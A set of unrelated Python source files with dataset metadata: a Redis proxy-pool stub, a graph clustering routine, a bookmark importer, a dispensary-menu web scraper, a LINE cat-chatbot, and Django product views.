__name__ == "__main__": ip_example = ['182.35.85.193', '9999', '山东泰安', '高匿', 'HTTP'] test = IPPool() test.insert_ip(ip_example) print("Info: get a random key from IPPool") print(test.get_random_key()) print(test.get_proxy_ip_cnt())
null
db/redis.py
redis.py
py
1,709
python
en
code
null
code-starcoder2
83
[ { "api_name": "redis.Redis", "line_number": 15, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 25, "usage_type": "call" } ]
221667612
import numpy as np import matplotlib.pyplot as plt euclidean_distance = lambda data, point: np.sqrt(np.sum(np.power(data - point, 2), axis = 1).reshape((len(data), 1))) def relative_neighborhood_graphs(data): #debug: #plt.gca().set_aspect('equal', adjustable='box') #construct the complete Graph G N = len(data) G = np.empty((N, 0)) for point in data: G = np.concatenate((G, euclidean_distance(data,point)), axis=1) ############### RNG = np.zeros(G.shape) #O(n^3) time for i, point1 in enumerate(data): for j, point2 in enumerate(data): if i != j: flag = 1 for k, pointK in enumerate(data): if k != i and k !=j: if max(G[i, k], G[j,k]) < G[i, j]: flag = 0 break if flag: #form an edge RNG[i, j] = G[i, j] #debug #visualize RNG plt.scatter(data[:, 0], data[:, 1]) x_, y_ = np.nonzero(RNG) for x, y in zip(x_, y_): if x < y: plt.plot((data[x, 0], data[y, 0]), (data[x, 1], data[y, 1])) plt.show() ############################## data = np.hstack((data, np.zeros((len(data), 1)))) visited_nodes = np.zeros(N) #dfs from now on cluster_id = 1 for s in range(N): if(visited_nodes[s] == 0): visited_nodes[s] = 1 data[s, 2] = cluster_id _dfs_util(G, s, visited_nodes, cluster_id, data) cluster_id += 1 return data def _dfs_util(MST, s, visited_nodes, cluster_id, data): adj_nodes = np.nonzero(MST[s, :]) for node in adj_nodes[0]: if visited_nodes[node] == 0: visited_nodes[node] = 1 data[node, -1] = cluster_id _dfs_util(MST, node, visited_nodes, cluster_id, data)
null
graph_theory/RNG.py
RNG.py
py
2,027
python
en
code
null
code-starcoder2
83
[ { "api_name": "numpy.sqrt", "line_number": 5, "usage_type": "call" }, { "api_name": "numpy.sum", "line_number": 5, "usage_type": "call" }, { "api_name": "numpy.power", "line_number": 5, "usage_type": "call" }, { "api_name": "numpy.empty", "line_number": 14, "usage_type": "call" }, { "api_name": "numpy.concatenate", "line_number": 16, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 20, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.scatter", "line_number": 40, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name" }, { "api_name": "numpy.nonzero", "line_number": 41, "usage_type": "call" }, { "api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name" }, { "api_name": "matplotlib.pyplot.show", "line_number": 45, "usage_type": "call" }, { "api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name" }, { "api_name": "numpy.hstack", "line_number": 51, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 51, "usage_type": "call" }, { "api_name": "numpy.zeros", "line_number": 53, "usage_type": "call" }, { "api_name": "numpy.nonzero", "line_number": 70, "usage_type": "call" } ]
198197657
"""Process an html delicious export and import them into bookie""" import codecs from datetime import datetime from BeautifulSoup import BeautifulSoup from sys import argv import urllib DELAPI = 'http://127.0.0.1:6543/delapi/posts/add?' def process(fname): """Given a file, process it""" bmark_file = codecs.open(fname, "r", "utf-8").read() soup = BeautifulSoup(bmark_file) for tag in soup.findAll('dt'): # if we have a dd as next sibling, get it's content if tag.nextSibling and tag.nextSibling.name == 'dd': extended = tag.nextSibling.text else: extended = "" link = tag.a # now get the link tag call_system(link, extended) def call_system(link_tag, extended): """Given a parsed <a> tag, store this""" date_fmt = "%Y-%m-%dT%H:%M:%SZ" add_date = datetime.fromtimestamp(float(link_tag['add_date'])) prms = { 'url': link_tag['href'].encode('utf-8'), 'description': link_tag.text.encode('utf-8'), 'extended': extended.encode('utf-8'), 'tags': " ".join(link_tag['tags'].split(',')).encode('utf-8'), 'dt': add_date.strftime(date_fmt), } req_params = urllib.urlencode(prms) call = urllib.urlopen(DELAPI + req_params) call.close() if __name__ == "__main__": filename = argv[1] process(filename)
null
Bookie/bookie/scripts/import_delicious.py
import_delicious.py
py
1,390
python
en
code
null
code-starcoder2
83
[ { "api_name": "codecs.open", "line_number": 13, "usage_type": "call" }, { "api_name": "BeautifulSoup.BeautifulSoup", "line_number": 14, "usage_type": "call" }, { "api_name": "datetime.datetime.fromtimestamp", "line_number": 32, "usage_type": "call" }, { "api_name": "datetime.datetime", "line_number": 32, "usage_type": "name" }, { "api_name": "urllib.urlencode", "line_number": 42, "usage_type": "call" }, { "api_name": "urllib.urlopen", "line_number": 44, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 49, "usage_type": "name" } ]
260923416
import time from selenium import webdriver from selenium.webdriver.chrome.options import Options from selenium.common.exceptions import NoSuchElementException import json import os,sys import CommonLibrary import urllib.request import zipcodes import us import requests from bs4 import BeautifulSoup home_path = os.path.abspath(os.path.join(os.path.realpath(os.path.dirname(sys.argv[0])), os.pardir)) + '/com.leafly' current_data_path = os.path.abspath(os.path.join(os.path.realpath(os.path.dirname(sys.argv[0])), os.pardir)) + '/current_data' previous_data_path = os.path.abspath(os.path.join(os.path.realpath(os.path.dirname(sys.argv[0])), os.pardir)) + '/previous_data' upload_data_path = os.path.abspath(os.path.join(os.path.realpath(os.path.dirname(sys.argv[0])), os.pardir)) + '/upload_data' CommonLibrary.CreateFolder('ZS_120') CommonLibrary.DashboardUploadBegin('ZS_120') CommonLibrary.CreateFolder('ZS_121') CommonLibrary.DashboardUploadBegin('ZS_121') CommonLibrary.CreateFolder('ZS_122') CommonLibrary.DashboardUploadBegin('ZS_122') CommonLibrary.CreateFolder('ZS_123') CommonLibrary.DashboardUploadBegin('ZS_123') CommonLibrary.CreateFolder('ZS_125') CommonLibrary.DashboardUploadBegin('ZS_125') CommonLibrary.CreateFolder('ZS_130') CommonLibrary.DashboardUploadBegin('ZS_130') CommonLibrary.CreateFolder('ZS_133') CommonLibrary.DashboardUploadBegin('ZS_133') if not os.path.exists(home_path + '/dispensary_url.uniq.txt'): #check availability uniq strains list file url = 'https://www.leafly.com/finder' options = Options() options.headless = True driver = webdriver.Chrome(options=options, executable_path=home_path + '/chromedriver') #driver = webdriver.Chrome(executable_path=soures_path + '/chromedriver') driver.get(url) driver.maximize_window() link_lists = '' try: driver.find_element_by_id("tou-continue").click() time.sleep(10) elements = driver.find_elements_by_tag_name('a') except NoSuchElementException: False for elem in elements: href = elem.get_attribute("href") if href is not None and 'dispensary-info' in href and not 'reviews' in href: textfilerow = str(href) + '\n' f = open(home_path + '/dispensary_url.txt', 'a+') f.write(textfilerow) f.close() driver.quit() cmd = 'chmod 777 ' + home_path +'/dispensary_url.txt' #set permission for file os.system(cmd) cmd = 'sort ' + home_path +'/dispensary_url.txt | uniq > '+ home_path +'/dispensary_url.uniq.txt' #filter uniq json object on text file os.system(cmd) cmd = 'rm -r ' + home_path +'/dispensary_url.txt' #text file remove for next time write on fresh file os.system(cmd) lastrun = CommonLibrary.GetLastRun(home_path + '/LastRun_Dispensary.txt') with open(home_path + '/dispensary_url.uniq.txt') as f: content = f.readlines() for x in range(len(content)): if x >= int(lastrun): url = content[x].strip() print (url) infopage = requests.get(content[x].strip()) soup_infopage = BeautifulSoup(infopage.content, 'html.parser') if soup_infopage.find("script", id="__NEXT_DATA__"): element = soup_infopage.find("script", id="__NEXT_DATA__") data = json.loads(element.get_text()) print (data) dispensary_name = '' dispensary_type = '' city = '' state = '' country = '' longitude = '' latitude = '' brand_location= '' product_type = '' rating_count = '' zip_code = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('zip') if zip_code: if len(zip_code) == 5 and zip_code.isdigit(): location_data = zipcodes.matching(zip_code) for a in location_data: city = a['city'] state = a['state'] country = a['country'] if not city: city = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('city') state = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('state') country = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('country') city = city.capitalize() state = us.states.lookup(state) state = str(state).replace('<State:', '') state = state.replace('>', '') if state == 'None': state = '' if city == 'None': city = '' if country == 'None': country = '' dispensary_name = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('name') #print (data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('tags')) #if len(data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('tags')) != 0: dispensary_type = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('tags')[0] dispensary_type = dispensary_type.capitalize() rating_count = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('ratings', {}).get('averageRating') latitude = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('mapMarkerLocations', {})[0]['latitude'] longitude = data.get('props', {}).get('pageProps', {}).get('dispensary', {}).get('mapMarkerLocations', {})[0]['longitude'] total_menu_items = data.get('props', {}).get('pageProps', {}).get('menu', {}) for one_menu in total_menu_items: product_type = '' product_category = '' product = '' brand = '' product_category = one_menu['category'] product = one_menu['name'] brand = one_menu['brandName'] brand = str(brand).replace('None', '') total_price_items = one_menu.get('variants', {}) for one_price in total_price_items: price = '' weight = '' weight_type = '' price = one_price['packagePrice'] weight = one_price['packageDisplayUnit'] if 'g' in weight: weight_type = 'gram' weight = str(weight).replace('g', '') if 'oz' in weight: weight_type = 'ounce' weight = str(weight).replace('oz', '') ##################################################### ZS_122 = [] ZS_122.append({ 'country': country, 'city': city, 'state': state, 'dispensary': dispensary_name, 'product_category': product_category, 'brand': brand, 'product': product, 'price': price, 'weight_type': weight_type, 'weight': weight, }) CommonLibrary.JsonFilesWrite('ZS_122', ZS_122) ##################################################### if brand != '' and price != '' and product != '' and product_category != '': ZS_123 = [] ZS_123.append({ 'country': country, 'city': city, 'state': state, 'product_category': product_category, 'brand': brand, 'product': product, 'price': price, 'weight_type': weight_type, 'weight': weight, }) CommonLibrary.JsonFilesWrite('ZS_123', ZS_123) ################################################### if brand != '': ZS_121 = [] ZS_121.append({ 'country': country, 'city': city, 'state': state, 'product_category': product_category, 'brand': brand, }) CommonLibrary.JsonFilesWrite('ZS_121', ZS_121) ################################################### if brand != '' and rating_count != '': ZS_130 = [] ZS_130.append({ 'country': country, 'city': city, 'state': state, 'dispensary': dispensary_name, 'product_category': product_category, 'brand': brand, 'rating_count': rating_count, }) CommonLibrary.JsonFilesWrite('ZS_130', ZS_130) #################################################### if brand != '': ZS_125 = [] ZS_125.append({ 'country': country, 'city': city, 'state': state, 'dispensary': dispensary_name, 'product_category': product_category, 'brand': brand, 'product_type': product_type, 'latitude': latitude, 'longitude': longitude, 'brand_location': brand_location, }) CommonLibrary.JsonFilesWrite('ZS_125', ZS_125) #################################################### if brand != '' and product != '': ZS_120 = [] ZS_120.append({ 'country': country, 'city': city, 'state': state, 'dispensary': dispensary_name, 'product_category': product_category, 'brand': brand, 'product': product, }) CommonLibrary.JsonFilesWrite('ZS_120', ZS_120) ####################################################### if dispensary_type != '': ZS_133 = [] ZS_133.append({ 'country': country, 'city': city, 'state': state, 'dispensary': dispensary_name, 'dispensary_type': dispensary_type, }) CommonLibrary.JsonFilesWrite('ZS_133', ZS_133) #################################################### CommonLibrary.UpdateLastRun('LastRun_Dispensary.txt', str(x + 1)) # each loop cycle finished update last time harvest number CommonLibrary.LogFilesWrite('com.weedmaps', url) CommonLibrary.LogFilesComplete('com.weedmaps.ZS_120') CommonLibrary.DashboardUploadFinish('ZS_120') CommonLibrary.FilesCompare('ZS_120') CommonLibrary.LogFilesComplete('com.weedmaps.ZS_121') CommonLibrary.DashboardUploadFinish('ZS_121') CommonLibrary.FilesCompare('ZS_121') CommonLibrary.LogFilesComplete('com.weedmaps.ZS_122') CommonLibrary.DashboardUploadFinish('ZS_122') CommonLibrary.FilesCompare('ZS_122') CommonLibrary.LogFilesComplete('com.weedmaps.ZS_123') CommonLibrary.DashboardUploadFinish('ZS_123') CommonLibrary.FilesCompare('ZS_123') CommonLibrary.LogFilesComplete('com.weedmaps.ZS_125') CommonLibrary.DashboardUploadFinish('ZS_125') CommonLibrary.FilesCompare('ZS_125') CommonLibrary.LogFilesComplete('com.weedmaps.ZS_130') CommonLibrary.DashboardUploadFinish('ZS_130') CommonLibrary.FilesCompare('ZS_130') CommonLibrary.LogFilesComplete('com.weedmaps.ZS_133') CommonLibrary.DashboardUploadFinish('ZS_133') CommonLibrary.FilesCompare('ZS_133') CommonLibrary.UpdateLastRun('LastRun_Dispensary.txt', '0') # loop set 0 foe next time harvest update all data os.remove(home_path + '/dispensary_url.uniq.txt') # remove dispensary list for next time CommonLibrary.StatesFlagUpdate(sys.argv[0])
null
data_process/com.leafly/com.leafly.py
com.leafly.py
py
15,962
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.path.abspath", "line_number": 14, "usage_type": "call" }, { "api_name": "os.path", "line_number": 14, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 14, "usage_type": "call" }, { "api_name": "os.path.realpath", "line_number": 14, "usage_type": "call" }, { "api_name": "os.path.dirname", "line_number": 14, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 14, "usage_type": "attribute" }, { "api_name": "os.pardir", "line_number": 14, "usage_type": "attribute" }, { "api_name": "os.path.abspath", "line_number": 15, "usage_type": "call" }, { "api_name": "os.path", "line_number": 15, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 15, "usage_type": "call" }, { "api_name": "os.path.realpath", "line_number": 15, "usage_type": "call" }, { "api_name": "os.path.dirname", "line_number": 15, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 15, "usage_type": "attribute" }, { "api_name": "os.pardir", "line_number": 15, "usage_type": "attribute" }, { "api_name": "os.path.abspath", "line_number": 16, "usage_type": "call" }, { "api_name": "os.path", "line_number": 16, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 16, "usage_type": "call" }, { "api_name": "os.path.realpath", "line_number": 16, "usage_type": "call" }, { "api_name": "os.path.dirname", "line_number": 16, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 16, "usage_type": "attribute" }, { "api_name": "os.pardir", "line_number": 16, "usage_type": "attribute" }, { "api_name": "os.path.abspath", "line_number": 17, "usage_type": "call" }, { "api_name": "os.path", "line_number": 17, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 17, "usage_type": "call" }, { "api_name": "os.path.realpath", "line_number": 17, "usage_type": "call" }, { "api_name": "os.path.dirname", "line_number": 17, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 17, "usage_type": "attribute" }, { "api_name": "os.pardir", "line_number": 17, "usage_type": "attribute" }, { "api_name": "CommonLibrary.CreateFolder", "line_number": 19, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadBegin", "line_number": 20, "usage_type": "call" }, { "api_name": "CommonLibrary.CreateFolder", "line_number": 21, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadBegin", "line_number": 22, "usage_type": "call" }, { "api_name": "CommonLibrary.CreateFolder", "line_number": 23, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadBegin", "line_number": 24, "usage_type": "call" }, { "api_name": "CommonLibrary.CreateFolder", "line_number": 25, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadBegin", "line_number": 26, "usage_type": "call" }, { "api_name": "CommonLibrary.CreateFolder", "line_number": 27, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadBegin", "line_number": 28, "usage_type": "call" }, { "api_name": "CommonLibrary.CreateFolder", "line_number": 29, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadBegin", "line_number": 30, "usage_type": "call" }, { "api_name": "CommonLibrary.CreateFolder", "line_number": 31, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadBegin", "line_number": 32, "usage_type": "call" }, { "api_name": "os.path.exists", "line_number": 33, "usage_type": "call" }, { "api_name": "os.path", "line_number": 33, "usage_type": "attribute" }, { "api_name": "selenium.webdriver.chrome.options.Options", "line_number": 35, "usage_type": "call" }, { "api_name": "selenium.webdriver.Chrome", "line_number": 37, "usage_type": "call" }, { "api_name": "selenium.webdriver", "line_number": 37, "usage_type": "name" }, { "api_name": "time.sleep", "line_number": 44, "usage_type": "call" }, { "api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 46, "usage_type": "name" }, { "api_name": "os.system", "line_number": 57, "usage_type": "call" }, { "api_name": "os.system", "line_number": 59, "usage_type": "call" }, { "api_name": "os.system", "line_number": 61, "usage_type": "call" }, { "api_name": "CommonLibrary.GetLastRun", "line_number": 63, "usage_type": "call" }, { "api_name": "requests.get", "line_number": 70, "usage_type": "call" }, { "api_name": "bs4.BeautifulSoup", "line_number": 71, "usage_type": "call" }, { "api_name": "json.loads", "line_number": 74, "usage_type": "call" }, { "api_name": "zipcodes.matching", "line_number": 89, "usage_type": "call" }, { "api_name": "us.states.lookup", "line_number": 99, "usage_type": "call" }, { "api_name": "us.states", "line_number": 99, "usage_type": "attribute" }, { "api_name": "CommonLibrary.JsonFilesWrite", "line_number": 154, "usage_type": "call" }, { "api_name": "CommonLibrary.JsonFilesWrite", "line_number": 169, "usage_type": "call" }, { "api_name": "CommonLibrary.JsonFilesWrite", "line_number": 180, "usage_type": "call" }, { "api_name": "CommonLibrary.JsonFilesWrite", "line_number": 193, "usage_type": "call" }, { "api_name": "CommonLibrary.JsonFilesWrite", "line_number": 210, "usage_type": "call" }, { "api_name": "CommonLibrary.JsonFilesWrite", "line_number": 223, "usage_type": "call" }, { "api_name": "CommonLibrary.JsonFilesWrite", "line_number": 234, "usage_type": "call" }, { "api_name": "CommonLibrary.UpdateLastRun", "line_number": 236, "usage_type": "call" }, { "api_name": "CommonLibrary.LogFilesWrite", "line_number": 237, "usage_type": "call" }, { "api_name": "CommonLibrary.LogFilesComplete", "line_number": 239, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadFinish", "line_number": 240, "usage_type": "call" }, { "api_name": "CommonLibrary.FilesCompare", "line_number": 241, "usage_type": "call" }, { "api_name": "CommonLibrary.LogFilesComplete", "line_number": 242, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadFinish", "line_number": 243, "usage_type": "call" }, { "api_name": "CommonLibrary.FilesCompare", "line_number": 244, "usage_type": "call" }, { "api_name": "CommonLibrary.LogFilesComplete", "line_number": 245, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadFinish", "line_number": 246, "usage_type": "call" }, { "api_name": "CommonLibrary.FilesCompare", "line_number": 247, "usage_type": "call" }, { "api_name": "CommonLibrary.LogFilesComplete", "line_number": 248, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadFinish", "line_number": 249, "usage_type": "call" }, { "api_name": "CommonLibrary.FilesCompare", "line_number": 250, "usage_type": "call" }, { "api_name": "CommonLibrary.LogFilesComplete", "line_number": 251, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadFinish", "line_number": 252, "usage_type": "call" }, { "api_name": "CommonLibrary.FilesCompare", "line_number": 253, "usage_type": "call" }, { "api_name": "CommonLibrary.LogFilesComplete", "line_number": 254, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadFinish", "line_number": 255, "usage_type": "call" }, { "api_name": "CommonLibrary.FilesCompare", "line_number": 256, "usage_type": "call" }, { "api_name": "CommonLibrary.LogFilesComplete", "line_number": 257, "usage_type": "call" }, { "api_name": "CommonLibrary.DashboardUploadFinish", "line_number": 258, "usage_type": "call" }, { "api_name": "CommonLibrary.FilesCompare", "line_number": 259, "usage_type": "call" }, { "api_name": "CommonLibrary.UpdateLastRun", "line_number": 260, "usage_type": "call" }, { "api_name": "os.remove", "line_number": 261, "usage_type": "call" }, { "api_name": "CommonLibrary.StatesFlagUpdate", "line_number": 262, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 262, "usage_type": "attribute" } ]
211436182
import os import random from flask import Flask, request, abort from linebot import ( LineBotApi, WebhookHandler ) from linebot.exceptions import ( InvalidSignatureError ) from linebot.models import ( MessageEvent, TextMessage, TextSendMessage, TemplateSendMessage, ButtonsTemplate, PostbackTemplateAction, MessageTemplateAction, URITemplateAction, ImageSendMessage ) app = Flask(__name__) line_bot_api = LineBotApi(os.environ.get('CHANNEL_ACCESS_TOKEN')) handler = WebhookHandler(os.environ.get('CHANNEL_SECRET')) Favorability = {} cat_toy = {'普通的逗貓棒':['https://i.imgur.com/jtbU0Gi.png'], '一條魚':['https://i.imgur.com/ncK4QZL.png'], '一隻老鼠':['https://i.imgur.com/mb6Ws0g.png', 'https://i.imgur.com/wTJCm9H.png']} cat_food = {'點心':'https://i.imgur.com/wLs0yHy.png', '罐頭':'https://i.imgur.com/g4iJv1x.png', '貓糧':'https://i.imgur.com/9ZqH3Rk.png'} Emergencies = ['貓貓趴在你的電腦鍵盤上,偷偷看著你', '貓貓睡著了,請不要吵到他', '貓貓蹲在你背後,她感覺餓了', '貓貓坐在你腳上,蹭了你的肚子'] love = ['https://i.imgur.com/PzuAI3G.png', 'https://i.imgur.com/zOI0H0i.png'] @app.route("/callback", methods=['POST']) def callback(): # get X-Line-Signature header value signature = request.headers['X-Line-Signature'] # get request body as text body = request.get_data(as_text=True) app.logger.info("Request body: " + body) # handle webhook body try: handler.handle(body, signature) except InvalidSignatureError: print("Invalid signature. Please check your channel access token/channel secret.") abort(400) return 'OK' @handler.add(MessageEvent, message=TextMessage) def handle_message(event): cat_talk = "" meow = len(event.message.text) * "喵" if event.message.text == "餵食": reply = TemplateSendMessage( alt_text = 'Buttons template', template = ButtonsTemplate( thumbnail_image_url='https://i.imgur.com/oMAspmB.png', title='餵食', text='請選擇要餵的食物', actions=[ MessageTemplateAction( label='點心', text='點心' ), MessageTemplateAction( label='罐頭', text='罐頭' ), MessageTemplateAction( label='貓糧', text='貓糧' ) ] ) ) elif event.message.text == "逗貓": reply = TemplateSendMessage( alt_text = 'Buttons template', template = ButtonsTemplate( thumbnail_image_url='https://i.imgur.com/2YHXdZG.png', title='逗貓', text='請選擇一根逗貓棒', actions=[ MessageTemplateAction( label='普通的逗貓棒', text='普通的逗貓棒' ), MessageTemplateAction( label='一條魚', text='一條魚' ), MessageTemplateAction( label='一隻老鼠', text='一隻老鼠' ) ] ) ) elif event.message.text == "查看好感度": if event.source.user_id not in Favorability: Favorability[event.source.user_id] = 0 cat_talk = str(Favorability[event.source.user_id]) print(Favorability) if event.message.text == "逗貓": line_bot_api.reply_message(event.reply_token, reply) elif event.message.text in cat_toy: add = random.randint(-10,10) if add <= 0: cat_talk = random.choice(["去去,貓貓不想跟你玩了", "去去,奴才走"]) else: cat_talk = random.choice(["我才沒有想跟你玩呢!(撲過去", "走開,我才沒有要跟你玩呢(偷喵"]) if event.source.user_id not in Favorability: Favorability[event.source.user_id] = 0 + add else: Favorability[event.source.user_id] = Favorability[event.source.user_id] + add reply = [ ImageSendMessage( original_content_url=random.choice(cat_toy[event.message.text]), preview_image_url=random.choice(cat_toy[event.message.text]) ), TextSendMessage(text=cat_talk) ] line_bot_api.reply_message(event.reply_token, reply) elif event.message.text == "餵食": line_bot_api.reply_message(event.reply_token, reply) elif event.message.text in cat_food: add = random.randint(-15,30) if add <= 0: cat_talk = "貓貓覺得難吃" else: cat_talk = "奴才做得不錯嘛" if event.source.user_id not in Favorability: Favorability[event.source.user_id] = 0 + add else: Favorability[event.source.user_id] = Favorability[event.source.user_id] + add reply = [ ImageSendMessage( original_content_url=cat_food[event.message.text], preview_image_url=cat_food[event.message.text] ), TextSendMessage(text=cat_talk) ] line_bot_api.reply_message(event.reply_token,reply) else: if Favorability[event.source.user_id] >= 100: picture = random.choice(love) reply = [ ImageSendMessage( original_content_url=picture, preview_image_url=picture ), TextSendMessage(text=cat_talk + meow) ] line_bot_api.reply_message(event.reply_token,reply) elif Favorability[event.source.user_id] >= 75: if random.randint(0,100) // 5 == 0: reply = [ TextSendMessage(text=random.choice(Emergencies)), TextSendMessage(text=cat_talk + meow) ] else: reply = TextSendMessage(text=cat_talk + meow) line_bot_api.reply_message(event.reply_token,reply) else: line_bot_api.reply_message( event.reply_token, TextSendMessage(text=cat_talk + meow) ) if __name__ == "__main__": app.run()
null
app.py
app.py
py
6,716
python
en
code
null
code-starcoder2
83
[ { "api_name": "flask.Flask", "line_number": 15, "usage_type": "call" }, { "api_name": "linebot.LineBotApi", "line_number": 17, "usage_type": "call" }, { "api_name": "os.environ.get", "line_number": 17, "usage_type": "call" }, { "api_name": "os.environ", "line_number": 17, "usage_type": "attribute" }, { "api_name": "linebot.WebhookHandler", "line_number": 18, "usage_type": "call" }, { "api_name": "os.environ.get", "line_number": 18, "usage_type": "call" }, { "api_name": "os.environ", "line_number": 18, "usage_type": "attribute" }, { "api_name": "flask.request.headers", "line_number": 28, "usage_type": "attribute" }, { "api_name": "flask.request", "line_number": 28, "usage_type": "name" }, { "api_name": "flask.request.get_data", "line_number": 31, "usage_type": "call" }, { "api_name": "flask.request", "line_number": 31, "usage_type": "name" }, { "api_name": "linebot.exceptions.InvalidSignatureError", "line_number": 37, "usage_type": "name" }, { "api_name": "flask.abort", "line_number": 39, "usage_type": "call" }, { "api_name": "linebot.models.TemplateSendMessage", "line_number": 52, "usage_type": "call" }, { "api_name": "linebot.models.ButtonsTemplate", "line_number": 54, "usage_type": "call" }, { "api_name": "linebot.models.MessageTemplateAction", "line_number": 59, "usage_type": "call" }, { "api_name": "linebot.models.MessageTemplateAction", "line_number": 63, "usage_type": "call" }, { "api_name": "linebot.models.MessageTemplateAction", "line_number": 67, "usage_type": "call" }, { "api_name": "linebot.models.TemplateSendMessage", "line_number": 77, "usage_type": "call" }, { "api_name": "linebot.models.ButtonsTemplate", "line_number": 79, "usage_type": "call" }, { "api_name": "linebot.models.MessageTemplateAction", "line_number": 84, "usage_type": "call" }, { "api_name": "linebot.models.MessageTemplateAction", "line_number": 88, "usage_type": "call" }, { "api_name": "linebot.models.MessageTemplateAction", "line_number": 92, "usage_type": "call" }, { "api_name": "random.randint", "line_number": 112, "usage_type": "call" }, { "api_name": "random.choice", "line_number": 114, "usage_type": "call" }, { "api_name": "random.choice", "line_number": 116, "usage_type": "call" }, { "api_name": "linebot.models.ImageSendMessage", "line_number": 124, "usage_type": "call" }, { "api_name": "random.choice", "line_number": 125, "usage_type": "call" }, { "api_name": "random.choice", "line_number": 126, "usage_type": "call" }, { "api_name": "linebot.models.TextSendMessage", "line_number": 128, "usage_type": "call" }, { "api_name": "random.randint", "line_number": 137, "usage_type": "call" }, { "api_name": "linebot.models.ImageSendMessage", "line_number": 149, "usage_type": "call" }, { "api_name": "linebot.models.TextSendMessage", "line_number": 153, "usage_type": "call" }, { "api_name": "random.choice", "line_number": 161, "usage_type": "call" }, { "api_name": "linebot.models.ImageSendMessage", "line_number": 163, "usage_type": "call" }, { "api_name": "linebot.models.TextSendMessage", "line_number": 167, "usage_type": "call" }, { "api_name": "random.randint", "line_number": 172, "usage_type": "call" }, { "api_name": "linebot.models.TextSendMessage", "line_number": 174, "usage_type": "call" }, { "api_name": "random.choice", "line_number": 174, "usage_type": "call" }, { "api_name": "linebot.models.TextSendMessage", "line_number": 175, "usage_type": "call" }, { "api_name": "linebot.models.TextSendMessage", "line_number": 178, "usage_type": "call" }, { "api_name": "linebot.models.TextSendMessage", "line_number": 184, "usage_type": "call" }, { "api_name": "linebot.models.MessageEvent", "line_number": 44, "usage_type": "argument" }, { "api_name": "linebot.models.TextMessage", "line_number": 44, "usage_type": "name" } ]
535837331
import json from annoying.decorators import render_to from django.contrib import messages from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger from django.core.urlresolvers import reverse from django.shortcuts import redirect, get_object_or_404 import requests from . import forms from . import models API = 'http://www.unisport.dk/api/sample/' def import_products(request): """ Simple import. Enough for sample project. In the real life should be asynchronous(celery.task or something..) with validation, logging, etc. """ for model in (models.Product, models.ProductSize): model.objects.all().delete() products = json.loads(requests.get(API).content).get('latest', []) for product in products: size_names = [size.strip() for size in product.pop('sizes', '').split(',')] product['product_id'] = product.pop('id') for field in ('price', 'price_old'): product[field] = product.get(field, '0').replace(',', '.') instance = models.Product.objects.create(**product) instance.sizes.add(*[models.ProductSize.objects.get_or_create(name=size_name)[0] for size_name in size_names]) messages.info(request, '%d products were saved in the DB' % len(products)) return redirect(reverse('product_list')) @render_to('products/list.html') def product_list(request, **kwargs): """ Keyword arguments define filtering and ordering rules Example: product_list(request, ordering=('name', ), kids=1) will return queryset for /products/kids/ page ordered by name Default ordering is ('price', ) - cheapest first """ ordering = kwargs.pop('ordering', ('price', )) paginator = Paginator(models.Product.objects.filter(**kwargs).order_by(*ordering), 10) page = request.GET.get('page') try: products = paginator.page(page) except PageNotAnInteger: products = paginator.page(1) except EmptyPage: products = paginator.page(paginator.num_pages) return {'products': products} @render_to('products/detail.html') def product_detail(request, pk): return {'product': get_object_or_404(models.Product, pk=pk)} @render_to('products/form.html') def change_product(request, pk=None): instance = get_object_or_404(models.Product, pk=pk) if pk else None if request.method == 'POST': form = forms.ProductForm(request.POST, instance=instance) if form.is_valid(): instance = form.save() return redirect(instance.get_absolute_url()) elif pk: instance = get_object_or_404(models.Product, pk=pk) form = forms.ProductForm(instance=instance) else: form = forms.ProductForm() return {'form': form} def delete_product(request, pk=None): instance = get_object_or_404(models.Product, pk=pk) instance.delete() messages.info(request, 'Product was successfully deleted') return redirect(reverse('product_list'))
null
products/views.py
views.py
py
2,970
python
en
code
null
code-starcoder2
83
